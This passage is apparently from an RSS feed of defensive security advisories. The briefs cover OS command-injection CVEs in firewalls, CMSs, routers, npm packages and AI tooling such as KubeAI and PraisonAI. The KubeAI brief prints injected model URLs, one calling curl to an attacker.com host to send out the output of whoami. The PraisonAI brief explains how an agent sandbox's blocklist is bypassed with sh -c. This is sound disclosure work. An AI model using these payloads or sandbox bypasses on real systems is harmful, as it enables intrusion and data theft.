<p>Successful exploitation of this vulnerability allows an attacker to execute arbitrary OS commands on the affected Endian Firewall system. This can lead to complete system compromise, including data theft, service disruption, and the potential to use the compromised system as a launchpad for further attacks within the network. Given that firewalls are critical security components, a compromise could have severe consequences for the entire network infrastructure, leading to widespread data breaches and significant financial losses.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply available patches or upgrade to a supported version of Endian Firewall that addresses CVE-2026-34791 (refer to Endian Firewall&rsquo;s advisory).</li>
<li>Implement the Sigma rule <code>Detect Suspicious Logs Proxy Date Parameter</code> to detect potential exploitation attempts.</li>
<li>Monitor web server logs for suspicious requests to <code>/cgi-bin/logs_proxy.cgi</code> containing unusual characters or command-like syntax in the <code>DATE</code> parameter.</li>
<li>Implement strong input validation and sanitization for all user-supplied input to prevent command injection attacks.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>command-injection</category><category>rce</category><category>vulnerability</category></item><item><title>DefaultFuction CMS 1.0 Command Injection Vulnerability (CVE-2026-5333)</title><link>https://feed.craftedsignal.io/briefs/2026-04-defaultfunction-cms-command-injection/</link><pubDate>Thu, 02 Apr 2026 14:16:36 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-defaultfunction-cms-command-injection/</guid><description>DefaultFuction Content-Management-System 1.0 is vulnerable to command injection via manipulation of the 'host' argument in the /admin/tools.php file, allowing remote attackers to execute arbitrary commands.</description><content:encoded><![CDATA[<p>On April 2, 2026, a command injection vulnerability, CVE-2026-5333, was disclosed in DefaultFuction Content-Management-System version 1.0. The vulnerability resides in the <code>/admin/tools.php</code> file and is triggered by manipulating the <code>host</code> argument. This allows remote attackers to inject and execute arbitrary commands on the system. The existence of a public exploit increases the risk of exploitation, making it crucial for organizations using this CMS version to implement mitigation measures. The affected software has a limited user base, but successful exploitation can lead to complete system compromise.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a vulnerable DefaultFuction CMS 1.0 instance.</li>
<li>The attacker sends a crafted HTTP request to <code>/admin/tools.php</code>, manipulating the <code>host</code> parameter with an injected command.</li>
<li>The application fails to properly sanitize or validate the <code>host</code> parameter.</li>
<li>The injected command is executed by the underlying operating system with the privileges of the web server.</li>
<li>The attacker gains initial access to the server.</li>
<li>The attacker may attempt to escalate privileges using publicly available exploits or misconfigurations.</li>
<li>The attacker installs a web shell or other persistent access mechanism.</li>
<li>The attacker performs reconnaissance on the internal network and exfiltrates sensitive data or causes other damage.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-5333 allows a remote attacker to execute arbitrary commands on the affected server. This can lead to complete compromise of the system, including sensitive data theft, modification of website content, and potential lateral movement within the network. Given the publicly available exploit, the risk of widespread exploitation is significant for unpatched DefaultFuction CMS 1.0 instances.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply any available patches or updates for DefaultFuction Content-Management-System 1.0 to address CVE-2026-5333.</li>
<li>Deploy the Sigma rule <code>Detect Suspicious HTTP Request to admin/tools.php</code> to detect exploitation attempts in web server logs.</li>
<li>Monitor web server logs for suspicious activity, especially requests containing shell commands in the <code>host</code> parameter.</li>
<li>Implement input validation and sanitization measures to prevent command injection vulnerabilities in web applications.</li>
<li>Restrict access to the <code>/admin/tools.php</code> file to authorized users only.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>command-injection</category><category>web-application</category><category>cve-2026-5333</category></item><item><title>CVE-2026-33613: Remote Code Execution in generateSrpArray Function</title><link>https://feed.craftedsignal.io/briefs/2026-04-cve-2026-33613/</link><pubDate>Thu, 02 Apr 2026 10:16:15 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-cve-2026-33613/</guid><description>CVE-2026-33613 describes a remote code execution (RCE) vulnerability due to improper neutralization of special elements used in an OS command in the generateSrpArray function, leading to full system compromise, but requires a separate method for writing arbitrary data to the user table.</description><content:encoded><![CDATA[<p>CVE-2026-33613 is a remote code execution (RCE) vulnerability affecting the <code>generateSrpArray</code> function due to improper neutralization of special elements used in an OS command. Successful exploitation allows a remote attacker to achieve full system compromise. This vulnerability is triggered by writing arbitrary data to the user table, representing a significant security risk if combined with other vulnerabilities that enable such data manipulation. The vulnerability was published on April 2, 2026, and reported by CERT VDE. Defenders should prioritize investigating any suspicious activity related to user table modifications and monitor for unexpected command execution originating from the <code>generateSrpArray</code> function. The CVSS v3.1 score is 7.2, indicating a high severity.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker gains initial access through an external vulnerability or compromised credentials.</li>
<li>Attacker leverages this access to inject arbitrary data into the user table.</li>
<li>The system processes the malicious data in the user table through the <code>generateSrpArray</code> function.</li>
<li>Due to improper neutralization of special elements, the injected data is interpreted as an OS command.</li>
<li>The <code>generateSrpArray</code> function executes the attacker-controlled OS command.</li>
<li>The attacker gains remote code execution with the privileges of the <code>generateSrpArray</code> function.</li>
<li>The attacker escalates privileges to gain full system control.</li>
<li>The attacker performs malicious activities, such as data exfiltration, installing backdoors, or causing denial of service.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-33613 leads to complete system compromise, granting the attacker full control over the affected system. This can result in data breaches, service disruption, and significant financial losses. While the number of potential victims and targeted sectors are currently unknown, any system utilizing the vulnerable <code>generateSrpArray</code> function is at risk. Given the high CVSS score (7.2), organizations should prioritize patching and mitigation efforts.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Monitor for unusual writes or modifications to the user table using file integrity monitoring or database auditing, to identify potential exploitation attempts (file_event, registry_set).</li>
<li>Implement input validation and sanitization for any data processed by the <code>generateSrpArray</code> function to prevent OS command injection (webserver, linux/windows).</li>
<li>Deploy the provided Sigma rules to detect potential exploitation attempts and post-exploitation activity (process_creation).</li>
<li>Investigate any processes spawned by the <code>generateSrpArray</code> function, especially those with unusual command-line arguments, using endpoint detection and response (EDR) solutions.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>cve-2026-33613</category><category>rce</category><category>command-injection</category></item><item><title>PraisonAI SubprocessSandbox Shell Escape via sh/bash</title><link>https://feed.craftedsignal.io/briefs/2024-01-03-praisonai-sandbox-escape/</link><pubDate>Wed, 01 Apr 2026 23:26:01 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-03-praisonai-sandbox-escape/</guid><description>PraisonAI's SubprocessSandbox allows attackers to bypass command restrictions due to the use of `shell=True` in `subprocess.run()` combined with an insufficient blocklist that does not include `sh` or `bash`, enabling command execution via `sh -c '&lt;command&gt;'`.</description><content:encoded><![CDATA[<p>PraisonAI&rsquo;s <code>SubprocessSandbox</code>, even in STRICT mode, is vulnerable to a sandbox escape. The vulnerability arises from the use of <code>subprocess.run()</code> with <code>shell=True</code> in <code>sandbox_executor.py</code>, coupled with an insufficient blocklist that fails to include <code>sh</code> and <code>bash</code> as standalone executables. This oversight allows attackers to bypass the intended command restrictions by executing arbitrary commands through <code>sh -c '&lt;command&gt;'</code>.  Versions of PraisonAI up to 4.5.96 are affected. This means that any command blocked by the configured policy can be trivially executed, which could allow agent prompt injection attacks to lead to full system compromise.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker crafts a malicious command to be executed within the PraisonAI environment.</li>
<li>The PraisonAI application receives the crafted command and attempts to execute it within the <code>SubprocessSandbox</code>.</li>
<li>The <code>SubprocessSandbox</code> uses <code>subprocess.run()</code> with <code>shell=True</code> to execute the provided command.</li>
<li>The blocklist in <code>sandbox_executor.py</code> fails to block the <code>sh</code> or <code>bash</code> commands themselves.</li>
<li>The attacker injects shell commands via <code>sh -c '&lt;blocked_command&gt;'</code>, bypassing the string-pattern matching intended to restrict execution.</li>
<li>The <code>sh</code> process executes the attacker&rsquo;s command within the sandbox&rsquo;s context, bypassing the intended security restrictions.</li>
<li>The attacker gains unauthorized access to resources such as network connections, the filesystem, or cloud metadata services.</li>
<li>The attacker escalates privileges and potentially compromises the entire system.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability allows attackers to bypass the intended security restrictions imposed by the PraisonAI <code>SubprocessSandbox</code>, even in its strictest configuration. This could lead to privilege escalation, unauthorized access to sensitive data, and the potential compromise of the entire system. Specifically, an attacker could leverage this escape to access network resources, manipulate the filesystem, or extract sensitive information from cloud metadata services. The lack of effective sandboxing could have severe consequences for environments relying on PraisonAI for secure execution of untrusted code.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply the suggested fix of using <code>shlex.split()</code> and <code>shell=False</code> when calling <code>subprocess.run()</code> to prevent shell command injection (reference: suggested fix code block).</li>
<li>Upgrade PraisonAI to a version beyond 4.5.96 to incorporate the patch for CVE-2026-34955 (reference: CVE-2026-34955).</li>
<li>Deploy the provided Sigma rule to detect the execution of <code>sh</code> or <code>bash</code> with the <code>-c</code> option, which is indicative of attempts to bypass command restrictions (reference: Sigma rule &ldquo;Detect sh/bash Command Execution with -c Option&rdquo;).</li>
<li>Implement a more comprehensive blocklist that includes <code>sh</code> and <code>bash</code> as standalone executables in addition to dangerous patterns (reference: <code>sandbox_executor.py:179</code>).</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>sandbox-escape</category><category>command-injection</category><category>praisonai</category></item><item><title>KubeAI OS Command Injection via Model URL in Ollama Engine Startup Probe</title><link>https://feed.craftedsignal.io/briefs/2026-04-kubeai-command-injection/</link><pubDate>Wed, 01 Apr 2026 23:22:43 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-kubeai-command-injection/</guid><description>The KubeAI project is vulnerable to OS command injection because the `ollamaStartupProbeScript()` function constructs a shell command string using `fmt.Sprintf` with unsanitized model URL components (`ref`, `modelParam`), which is then executed via `bash -c` as a Kubernetes startup probe, allowing arbitrary command execution inside model server pods by attackers with the ability to create or update `Model` custom resources.</description><content:encoded><![CDATA[<p>KubeAI versions 0.23.1 and earlier are vulnerable to an OS command injection flaw in the Ollama engine&rsquo;s startup probe. The vulnerability stems from the <code>ollamaStartupProbeScript()</code> function, which constructs a shell command using <code>fmt.Sprintf</code> with unsanitized model URL components (<code>ref</code> and <code>modelParam</code>). These components are extracted from the Model custom resource URL. An attacker who can create or update <code>Model</code> custom resources can inject arbitrary shell commands, which are then executed within the model server pods. This occurs because the extracted URL components are not sanitized before being interpolated into a shell command executed by <code>bash -c</code>. Successful exploitation allows attackers to compromise the model serving infrastructure and potentially access sensitive information or execute commands on the underlying host.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains the ability to create or update <code>Model</code> custom resources in a KubeAI environment. This could be through compromised credentials, misconfigured RBAC permissions, or other vulnerabilities.</li>
<li>The attacker crafts a malicious <code>Model</code> custom resource with a specially crafted URL in the <code>spec.url</code> field. The URL contains shell metacharacters and commands within the <code>ref</code> component or the <code>model</code> query parameter. For example, <code>ollama://registry.example.com/model;id&gt;/tmp/pwned;echo</code> or <code>pvc://my-pvc?model=qwen2:0.5b;curl${IFS}http://attacker.com/$(whoami);echo</code>.</li>
<li>The attacker applies the malicious <code>Model</code> resource to the Kubernetes cluster, triggering the KubeAI model controller.</li>
<li>The <code>parseModelURL()</code> function parses the malicious URL and extracts the unsanitized <code>ref</code> and <code>modelParam</code> components.</li>
<li>The <code>ollamaStartupProbeScript()</code> function constructs a shell command string using <code>fmt.Sprintf</code> with the unsanitized <code>ref</code> and <code>modelParam</code> components. The resulting command is intended to pull or copy the specified model.</li>
<li>The KubeAI model controller creates a pod for the model server, configuring a startup probe that executes the crafted shell command via <code>bash -c</code>.</li>
<li>The Kubernetes kubelet executes the startup probe, running the attacker-injected shell commands within the pod&rsquo;s context.</li>
<li>The attacker achieves arbitrary command execution inside the model server pod, potentially leading to data exfiltration, lateral movement, or compromise of the model serving infrastructure.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability allows for arbitrary command execution within KubeAI model server pods. This can lead to several severe consequences: data exfiltration from the pod&rsquo;s environment (environment variables, mounted secrets, service account tokens), lateral movement to other cluster resources in multi-tenant environments, and compromise of the model serving infrastructure. An attacker with Model creation permissions can execute arbitrary commands in model pods, potentially accessing sensitive data. The vulnerability affects KubeAI installations version 0.23.1 and earlier.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade KubeAI to a version beyond 0.23.1 that includes the fix for CVE-2026-34940.</li>
<li>Implement strict RBAC policies to limit who can create or update <code>Model</code> custom resources.</li>
<li>Deploy the Sigma rule &ldquo;Detect KubeAI Model Resource Command Injection&rdquo; to identify malicious <code>Model</code> resources being created or updated.</li>
<li>Monitor Kubernetes audit logs for suspicious activity related to <code>Model</code> custom resource creation and updates.</li>
<li>If upgrading is not immediately feasible, consider implementing a Kubernetes admission webhook that validates and sanitizes the <code>spec.url</code> field of <code>Model</code> custom resources, allowing only alphanumeric characters, slashes, colons, dots, and hyphens.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>kubeai</category><category>command-injection</category><category>kubernetes</category><category>cloud</category></item><item><title>IBM Verify Identity Access and Security Verify Access Command Injection Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-04-ibm-verify-rce/</link><pubDate>Wed, 01 Apr 2026 21:16:58 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-ibm-verify-rce/</guid><description>Unauthenticated command execution is possible in IBM Verify Identity Access Container and IBM Security Verify Access Container due to improper validation of user-supplied input, allowing arbitrary command execution with lower privileges.</description><content:encoded><![CDATA[<p>IBM Verify Identity Access Container versions 11.0 through 11.0.2 and IBM Security Verify Access Container versions 10.0 through 10.0.9.1, as well as IBM Verify Identity Access 11.0 through 11.0.2 and IBM Security Verify Access 10.0 through 10.0.9.1, are vulnerable to command injection. An unauthenticated attacker can exploit this vulnerability (CVE-2026-1345) to execute arbitrary commands with lower user privileges due to insufficient input validation. This poses a significant risk as it could lead to unauthorized access, data breaches, or system compromise if successfully exploited. Defenders need to ensure systems are patched and monitor for suspicious activity.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An unauthenticated attacker sends a malicious request to the vulnerable IBM Verify or Security Verify Access server.</li>
<li>The request contains crafted input designed to exploit the command injection vulnerability.</li>
<li>The server fails to properly validate the user-supplied input.</li>
<li>The malicious input is passed to an operating system command.</li>
<li>The server executes the attacker-controlled command with the privileges of the compromised user (lower user privileges).</li>
<li>The attacker gains unauthorized access to the system.</li>
<li>The attacker can then potentially escalate privileges, move laterally, or exfiltrate sensitive data.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability (CVE-2026-1345) allows an unauthenticated attacker to execute arbitrary commands on the affected system with lower user privileges. While the attacker does not gain root access directly, this vulnerability can be used as a stepping stone to further compromise the system, potentially leading to data breaches, service disruption, or complete system takeover. The lack of initial authentication makes it easily exploitable.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply the security patch provided by IBM as detailed in their advisory to remediate CVE-2026-1345 (<a href="https://www.ibm.com/support/pages/node/7268253)">https://www.ibm.com/support/pages/node/7268253)</a>.</li>
<li>Implement input validation and sanitization measures on all user-supplied input to prevent command injection attacks.</li>
<li>Monitor web server logs for suspicious requests and patterns that indicate command injection attempts, creating correlation rules using webserver logs.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>command-injection</category><category>rce</category><category>cve-2026-1345</category></item><item><title>NVIDIA Jetson Linux initrd Command Injection Vulnerability (CVE-2026-24154)</title><link>https://feed.craftedsignal.io/briefs/2026-03-nvidia-jetson-initrd-vuln/</link><pubDate>Tue, 31 Mar 2026 17:16:30 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-nvidia-jetson-initrd-vuln/</guid><description>CVE-2026-24154 is a vulnerability in NVIDIA Jetson Linux where an unprivileged attacker with physical access can inject incorrect command line arguments into initrd, potentially leading to code execution, privilege escalation, denial of service, data tampering, and information disclosure.</description><content:encoded><![CDATA[<p>CVE-2026-24154 affects NVIDIA Jetson Linux and stems from a flaw within the initrd (initial RAM disk) process.  An unprivileged attacker with physical access to a vulnerable device can inject malicious command-line arguments during the boot process. This injection can subvert the intended system initialization, leading to a variety of severe consequences.  The vulnerability was published on March 31, 2026, and has a CVSS v3.1 score of 7.6. The affected versions of Jetson Linux are not specified in the source.  Successful exploitation allows attackers to execute arbitrary code, escalate privileges, cause denial of service, tamper with data, and disclose sensitive information. Defenders should focus on securing physical access and monitoring boot processes for unauthorized modifications.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker gains physical access to the NVIDIA Jetson device.</li>
<li>Attacker interrupts the boot process to gain access to the bootloader. This may involve pressing specific keys during startup or utilizing hardware tools.</li>
<li>Attacker modifies the kernel command line arguments passed to the initrd. This is achieved by manipulating bootloader settings.</li>
<li>The modified command line arguments inject malicious commands or alter the execution path within the initrd environment.</li>
<li>During initrd execution, the injected commands are processed, leading to code execution within the early boot environment. This bypasses normal user authentication and security measures.</li>
<li>The attacker leverages the initial code execution to escalate privileges by exploiting vulnerabilities within the initrd environment or system binaries.</li>
<li>With escalated privileges, the attacker gains control over the system, enabling them to install persistent backdoors, tamper with system configurations, or exfiltrate sensitive data.</li>
<li>The final objective is achieved, which can range from complete system compromise and data theft to denial-of-service attacks.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-24154 can lead to a complete compromise of the NVIDIA Jetson Linux device. The attacker can achieve code execution, escalate privileges, and gain persistent access. This could result in data breaches, system instability, and the deployment of malicious software. While the number of potential victims and specific sectors targeted are not mentioned in the source, the vulnerability affects devices used in various embedded systems, robotics, and edge computing applications.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Restrict physical access to NVIDIA Jetson devices to prevent unauthorized manipulation of the boot process.</li>
<li>Monitor boot logs and system events for unusual command-line arguments or modifications to the initrd environment. Deploy the Sigma rule <code>Detect Modified Kernel Command Line</code> to identify suspicious boot activity.</li>
<li>Consider implementing secure boot mechanisms to prevent unauthorized modifications to the bootloader and kernel.</li>
<li>Investigate any unauthorized access attempts or physical tampering with Jetson devices.</li>
<li>Apply any available patches or updates from NVIDIA to mitigate the vulnerability when they become available via NVIDIA&rsquo;s customer support portal referenced in the advisory.</li>
<li>Monitor network connections originating from the device after boot for unexpected or malicious activity, using network connection logs, to identify potential exploitation attempts.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>cve-2026-24154</category><category>nvidia</category><category>jetson</category><category>initrd</category><category>command injection</category><category>privilege escalation</category></item><item><title>OpenClaw Remote Command Injection via iMessage Attachment Staging (CVE-2026-32917)</title><link>https://feed.craftedsignal.io/briefs/2026-03-openclaw-rce/</link><pubDate>Tue, 31 Mar 2026 12:16:28 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-openclaw-rce/</guid><description>OpenClaw before 2026.3.13 is vulnerable to remote command injection via unsanitized iMessage attachment paths passed to the SCP remote operand, allowing attackers to execute arbitrary commands on configured remote hosts when remote attachment staging is enabled.</description><content:encoded>&lt;p>OpenClaw, a software application whose specific function is not detailed in the provided context, is vulnerable to a remote command injection flaw. Specifically, versions prior to 2026.3.13 are susceptible. This vulnerability, identified as CVE-2026-32917, resides within the iMessage attachment staging process.  Attackers can exploit this flaw by injecting shell metacharacters into unsanitized remote attachment paths. This occurs because these paths are directly passed to the SCP command…&lt;/p>
</content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>command-injection</category><category>imessage</category><category>openclaw</category></item><item><title>Totolink A3300R Command Injection Vulnerability (CVE-2026-5176)</title><link>https://feed.craftedsignal.io/briefs/2026-03-totolink-cve-2026-5176/</link><pubDate>Tue, 31 Mar 2026 02:15:59 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-totolink-cve-2026-5176/</guid><description>A command injection vulnerability (CVE-2026-5176) exists in the setSyslogCfg function of the Totolink A3300R router version 17.0.0cu.557_b20221024, allowing remote attackers to execute arbitrary commands by manipulating arguments in the /cgi-bin/cstecgi.cgi file.</description><content:encoded><![CDATA[<p>A command injection vulnerability, identified as CVE-2026-5176, has been discovered in Totolink A3300R routers running firmware version 17.0.0cu.557_b20221024. The vulnerability resides within the <code>setSyslogCfg</code> function located in the <code>/cgi-bin/cstecgi.cgi</code> file. An unauthenticated, remote attacker can exploit this flaw by manipulating arguments passed to the vulnerable function. This manipulation results in the execution of arbitrary commands on the affected device. Given the public…</p>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>command-injection</category><category>cve-2026-5176</category><category>totolink</category><category>router</category></item><item><title>baserCMS OS Command Injection Vulnerability (CVE-2026-21861)</title><link>https://feed.craftedsignal.io/briefs/2026-04-basercms-command-injection/</link><pubDate>Tue, 31 Mar 2026 01:19:59 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-basercms-command-injection/</guid><description>baserCMS versions prior to 5.2.3 are vulnerable to OS command injection, allowing an authenticated administrator to execute arbitrary commands on the server via maliciously crafted input to the core update functionality.</description><content:encoded>&lt;p>baserCMS, a website development framework, is susceptible to an OS command injection vulnerability (CVE-2026-21861) in versions prior to 5.2.3. This flaw resides within the core update functionality, where user-controlled input is directly passed to the &lt;code>exec()&lt;/code> function without proper sanitization or validation. A successful exploit allows an authenticated administrator to execute arbitrary operating system commands on the underlying server. The vulnerability was reported on March 30, 2026…&lt;/p>
</content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>cve-2026-21861</category><category>command-injection</category><category>webserver</category></item><item><title>baserCMS OS Command Injection Vulnerability (CVE-2026-30877)</title><link>https://feed.craftedsignal.io/briefs/2026-03-basercms-cmd-injection/</link><pubDate>Tue, 31 Mar 2026 01:16:35 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-basercms-cmd-injection/</guid><description>baserCMS prior to version 5.2.3 contains an OS command injection vulnerability in the update functionality, allowing authenticated administrators to execute arbitrary OS commands on the server.</description><content:encoded>&lt;p>baserCMS is a website development framework. Prior to version 5.2.3, a critical OS command injection vulnerability exists within the update functionality. This flaw allows an attacker, authenticated as an administrator, to inject and execute arbitrary operating system commands on the server hosting baserCMS. The commands are executed with the privileges of the user account running the baserCMS application, potentially leading to complete system compromise. This vulnerability was reported on…&lt;/p>
</content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>basercms</category><category>command-injection</category><category>webserver</category></item><item><title>Xiongmai DVR/NVR Root OS Command Injection Vulnerability (CVE-2026-34005)</title><link>https://feed.craftedsignal.io/briefs/2026-03-xiongmai-command-injection/</link><pubDate>Sun, 29 Mar 2026 17:16:44 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-xiongmai-command-injection/</guid><description>Xiongmai DVR/NVR devices are vulnerable to root OS command injection (CVE-2026-34005) due to shell metacharacters in the HostName value, exploitable via an authenticated DVRIP request, potentially allowing arbitrary command execution with root privileges.</description><content:encoded>&lt;p>Xiongmai DVR/NVR devices, specifically models AHB7008T-MH-V2 and NBD7024H-P running firmware version 4.03.R11, are susceptible to root OS command injection (CVE-2026-34005). This vulnerability arises from the inadequate sanitization of the HostName value within the NetWork.NetCommon configuration handler. An authenticated attacker can inject shell metacharacters into the HostName parameter through a DVRIP protocol request via TCP port 34567. Due to the use of the &lt;code>system()&lt;/code> function, these…&lt;/p>
</content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>CVE-2026-34005</category><category>command-injection</category><category>xiongmai</category><category>dvr</category><category>nvr</category></item><item><title>Foreman WebSocket Proxy Command Injection Vulnerability (CVE-2026-1961)</title><link>https://feed.craftedsignal.io/briefs/2026-03-foreman-rce/</link><pubDate>Thu, 26 Mar 2026 13:16:27 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-foreman-rce/</guid><description>A command injection vulnerability exists in Foreman's WebSocket proxy, enabling remote code execution on the Foreman server via a malicious compute resource server when a user accesses VM VNC console functionality.</description><content:encoded>&lt;p>CVE-2026-1961 identifies a critical command injection vulnerability within the Foreman application, specifically affecting the WebSocket proxy implementation. This flaw stems from the use of unsanitized hostname values obtained from compute resource providers during the construction of shell commands. An attacker who controls a malicious compute resource server can exploit this vulnerability to execute arbitrary code on the Foreman server. This is achieved when a user interacts with the VM VNC…&lt;/p>
</content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>command-injection</category><category>rce</category><category>foreman</category></item><item><title>node-tesseract-ocr OS Command Injection Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-03-node-tesseract-ocr-command-injection/</link><pubDate>Thu, 26 Mar 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-node-tesseract-ocr-command-injection/</guid><description>The node-tesseract-ocr npm package through version 2.2.1 is vulnerable to OS command injection due to improper sanitization of the file path parameter in the recognize() function, potentially allowing for arbitrary command execution.</description><content:encoded><![CDATA[<p>The node-tesseract-ocr npm package, a Node.js wrapper for Tesseract OCR, is vulnerable to OS command injection (CVE-2026-26832) in versions 2.2.1 and earlier. The vulnerability exists within the <code>recognize()</code> function located in <code>src/index.js</code>. The <code>file path</code> parameter, used to specify the image for OCR processing, is directly concatenated into a shell command string without proper sanitization. This unsanitized string is then passed to <code>child_process.exec()</code>, enabling attackers to inject arbitrary commands that are executed by the system. Exploitation can lead to complete system compromise, data exfiltration, or denial of service.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker crafts a malicious file path containing OS commands.</li>
<li>The attacker passes the malicious file path to the <code>recognize()</code> function within the <code>node-tesseract-ocr</code> package.</li>
<li>The <code>recognize()</code> function concatenates the attacker-controlled file path into a command string.</li>
<li>The command string, now containing injected OS commands, is passed to <code>child_process.exec()</code>.</li>
<li><code>child_process.exec()</code> executes the command string.</li>
<li>The injected OS commands are executed by the system with the privileges of the Node.js process.</li>
<li>The attacker gains arbitrary code execution on the target system.</li>
<li>The attacker can then perform actions such as installing malware, creating new user accounts, or exfiltrating sensitive data.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the server hosting the Node.js application. This can lead to complete system compromise, potentially impacting all data and services hosted on the compromised server. The severity is heightened because the vulnerability is remotely exploitable and requires no user interaction. Systems using affected versions of <code>node-tesseract-ocr</code> are at high risk.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade the <code>node-tesseract-ocr</code> package to a patched version that addresses CVE-2026-26832 if available.</li>
<li>Implement strict input validation and sanitization for the file path parameter passed to the <code>recognize()</code> function, mitigating command injection attempts.</li>
<li>Monitor process creation events for unusual processes spawned by Node.js (<code>node.exe</code> or <code>node</code>) to detect potential exploitation using the provided Sigma rule.</li>
<li>Review and audit all uses of <code>child_process.exec()</code> within Node.js applications to identify and remediate other potential command injection vulnerabilities.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>command-injection</category><category>nodejs</category><category>tesseract-ocr</category><category>cve-2026-26832</category></item><item><title>Netcore Power 15AX Remote Command Execution Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-03-netcore-rce/</link><pubDate>Thu, 26 Mar 2026 05:16:40 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-netcore-rce/</guid><description>CVE-2026-4840 is a critical command injection vulnerability in the Netcore Power 15AX router that allows remote attackers to execute arbitrary OS commands by manipulating the IpAddr argument in the setTools function of the /bin/netis.cgi file.</description><content:encoded><![CDATA[<p>A remote command execution vulnerability, CVE-2026-4840, affects Netcore Power 15AX devices with firmware versions up to 3.0.0.6938. The vulnerability resides in the Diagnostic Tool Interface, specifically within the <code>setTools</code> function of the <code>/bin/netis.cgi</code> file. By manipulating the <code>IpAddr</code> argument, an attacker can inject and execute arbitrary operating system commands on the device. This vulnerability poses a significant risk, as it allows unauthenticated remote attackers to gain complete…</p>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>command-injection</category><category>rce</category><category>vulnerability</category><category>netcore</category><category>router</category></item><item><title>pdf-image npm Package Command Injection Vulnerability (CVE-2026-26830)</title><link>https://feed.craftedsignal.io/briefs/2026-03-pdf-image-command-injection/</link><pubDate>Wed, 25 Mar 2026 15:16:38 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-pdf-image-command-injection/</guid><description>The pdf-image npm package through version 2.0.0 is vulnerable to OS command injection via the pdfFilePath parameter due to improper sanitization, potentially leading to arbitrary code execution.</description><content:encoded><![CDATA[<p>The pdf-image npm package, up to version 2.0.0, contains a critical vulnerability (CVE-2026-26830) that allows for OS command injection. This vulnerability stems from the way the package handles user-provided file paths when processing PDF files. Specifically, the <code>constructGetInfoCommand</code> and <code>constructConvertCommandForPage</code> functions utilize <code>util.format()</code> to incorporate the <code>pdfFilePath</code> parameter directly into shell command strings. These commands are then executed using…</p>
